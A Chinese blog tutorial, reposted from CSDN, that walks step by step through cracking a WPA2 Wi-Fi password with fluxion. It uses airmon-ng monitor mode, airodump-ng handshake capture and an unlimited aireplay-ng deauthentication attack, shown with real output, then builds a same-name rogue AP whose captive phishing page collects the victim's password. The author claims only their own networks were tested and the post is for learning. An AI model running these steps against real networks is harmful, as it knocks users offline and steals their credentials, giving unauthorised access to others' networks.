看了网上所有关于fluxion的钓鱼使用教程都感觉不太全,本文本是整理为了自己复习学习,初学有问题还请大佬指示。
测试硬件:
笔记本电脑
无限外置网卡一张
(两张网卡是必须的)
软件:
fluxion
airmon
查看网卡
airmon-ng
选择网卡
我用的是wlan0(wlan0为电脑自带网卡)
启动网卡监听
airmon-ng start wlan0
查看网卡监听信息
airodump-ng wlan0mon
选择网络信息
(图片不是本次抓包的截图)
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
E0:40:07:09:50:A8 -1 0 0 0 1 -1 <length: 0>
50:D2:F5:FE:FA:B1 -125 11 0 0 5 130 WPA2 CCMP PSK Xiaomi_FAB0
F6:D5:55:4E:09:6B -58 9 12 0 3 360 WPA2 CCMP PSK OnePlus 7 pro
获取握手包
airodump-ng -c (信道CH) --bssid (bssid) -w /root(握手包存放目录) wlan0mon
参数:
-c 指定频道号
--bssid 指定路由器bssid
-w 指定抓取的握手包存储路径
最后是指定网卡接口
CH 3 ][ Elapsed: 2 mins ][ 2020-09-08 00:54 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F6:D5:55:4E:09:6B -3 100 841 2360 5 3 360 WPA2 CCMP PSK OPPO K5
BSSID STATION PWR Rate Lost Frames Notes Probes
F6:D5:55:4E:09:6B 26:84:7E:83:93:77 -29 0e- 1e 0 16562 EAPOL OPPO K5 F6:D5:55:4E:09:6B 4C:32:75:94:C5:15 -53 0e-24e 1616 572
开始攻击来获取握手报
新打开一个Shell ,之前的不要关。
aireplay-ng -0 0(攻击次数 0为无限次) -a BSSID -c (使用设备MAC地址 STATION ) wlan0mon
参数解释:
-0 攻击次数(-0 2 即攻击2次,-0 0为无限次数)
-a 指定无线路由器BSSID
-c 指定强制断开的设备
最后是指定网卡接口
root@yuan:~# aireplay-ng -0 0 -a 50:D2:F5:FE:FA:B1 -c 38:6E:A2:5C:04:EC wlan0mon
00:15:28 Waiting for beacon frame (BSSID: 50:D2:F5:FE:FA:B1) on channel 5
00:15:29 Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [10|65 ACKs]
00:15:29 Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [10|63 ACKs]
00:15:30 Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [ 5|61 ACKs]
等待[ WPA handshake: F6:D5:55:4E:09:6B 出现证明握手包获取完成
在保存目录里.cap结尾的为握手包
找到fluxion目录
./fluxion.sh
运行fluxion
选择中文
(有人说中文有bug,如果英语好可以选择英语)
选择建立 AP (建立一个同名网络)
选择你想要搜索网络的网卡
选择信道(我一般都是所有信道)
扫描到你之前抓包的网络后按Ctrl+C结束扫描,填网络对应的序号回车
选择干扰你要钓鱼网站的网卡
接着无脑选择
选择3 流氓AP - hostapd
到这里最开始抓到握手包的用处来了
把你刚才抓到的握手包后缀为.cap的文件目录填上(直接拖拽最快)
回车
选择cowpatty验证
选择创建SSL证书
选择断开原网络
选择自己制作的钓鱼页面
出现这个页面证明钓鱼WIFI开始工作了,扫描WIFI原网络已经无法连接了只能自动连接我们自己伪造的同名AP
手机连接成功后自动弹窗输入密码后进行验证,右上角的框会有提示,生成一个文件里边有密码和网络信息
最后成果
本次测试钓鱼网络均为自己的网络,本文章仅供学习使用。
————————————————
版权声明:本文为CSDN博主「EVEB」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/u012781697/article/details/108451822